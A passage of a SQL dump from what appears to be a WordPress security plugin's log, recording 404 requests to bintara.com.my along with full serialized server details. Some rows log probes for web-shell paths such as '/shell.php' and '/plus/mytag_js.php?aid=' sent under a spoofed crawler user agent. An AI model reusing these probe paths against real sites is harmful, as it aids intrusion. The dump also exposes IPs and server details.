01:25:49',35034040,36837648,'https://bintara.com.my/shell.php',1,0,'51.79.4.180'),(27582,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"23.231.37.183\";s:11:\"REMOTE_PORT\";s:5:\"45864\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZnWITkjoKiPfp7KV-0isgAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570362913.6677\";s:12:\"REQUEST_TIME\";s:10:\"1570362913\";}}','notice','2019-10-06 11:55:16','2019-10-06 11:55:14',35425000,37240256,'https://bintara.com.my/?page_id=18',1,0,'23.231.37.183'),(27583,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C189F383-E86D-457D-B86F-57E790E06087\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZnb-0HM6BMglTuqyGO4DAAAAMQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.114\";s:11:\"REMOTE_PORT\";s:5:\"53633\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZnb-0HM6BMglTuqyGO4DAAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570364415.6307\";s:12:\"REQUEST_TIME\";s:10:\"1570364415\";}}','notice','2019-10-06 12:20:18','2019-10-06 12:20:16',35883408,37690352,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.114'),(27584,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:151:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.19.229.177\";s:11:\"REMOTE_PORT\";s:5:\"59608\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZngMBIkVaLRYqSs9rcTlwAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570365488.4062\";s:12:\"REQUEST_TIME\";s:10:\"1570365488\";}}','notice','2019-10-06 12:38:10','2019-10-06 12:38:08',35416192,37213000,'https://bintara.com.my/?page_id=18',1,0,'138.19.229.177'),(27585,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZoQsTkjoKiPfp7KV-0ziAAAAQI\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.115\";s:11:\"REMOTE_PORT\";s:4:\"3855\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZoQsTkjoKiPfp7KV-0ziAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570377905.2275\";s:12:\"REQUEST_TIME\";s:10:\"1570377905\";}}','notice','2019-10-06 16:05:10','2019-10-06 16:05:06',34382936,36184528,'https://bintara.com.my/toughbook-31/',1,0,'207.46.13.115'),(27729,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=8080\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"23.193.191.43\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=07ea3111a35492583d5583b5477f699f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"23.193.191.43\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydbHURUVLSjYCXpcIzRQAAAMo\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydbHURUVLSjYCXpcIzRQAAAMo\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydbHURUVLSjYCXpcIzRQAAAMo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"51787\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydbHURUVLSjYCXpcIzRQAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570545004.5764\";s:12:\"REQUEST_TIME\";s:10:\"1570545004\";}}','notice','2019-10-08 14:30:06','2019-10-08 14:30:04',35058960,36861608,'https://bintara.com.my/plus/mytag_js.php?aid=8080',1,0,'23.193.191.43'),(27730,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9090\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"57.118.58.165\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d0c068155f2e144613804b4605250989\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"57.118.58.165\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydfHURUVLSjYCXpcIzSQAAANQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydfHURUVLSjYCXpcIzSQAAANQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydfHURUVLSjYCXpcIzSQAAANQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"53057\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydfHURUVLSjYCXpcIzSQAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570545020.1665\";s:12:\"REQUEST_TIME\";s:10:\"1570545020\";}}','notice','2019-10-08 14:30:21','2019-10-08 14:30:20',35058960,36861608,'https://bintara.com.my/plus/mytag_js.php?aid=9090',1,0,'57.118.58.165'),(27731,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9191\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"145.116.108.18\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d8604cb9a6a44da68adc5bfb94dafc1a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"145.116.108.18\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydh3URUVLSjYCXpcIzSwAAAMw\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZydh3URUVLSjYCXpcIzSwAAAMw\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZydh3URUVLSjYCXpcIzSwAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"53057\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZydh3URUVLSjYCXpcIzSwAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570545031.7784\";s:12:\"REQUEST_TIME\";s:10:\"1570545031\";}}','notice','2019-10-08 14:30:33','2019-10-08 14:30:32',35053632,36854832,'https://bintara.com.my/plus/mytag_js.php?aid=9191',1,0,'145.116.108.18'),(27732,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9527\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"111.119.40.113\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2fbaa25ce9077a26ad73d05b63daec89\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"111.119.40.113\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_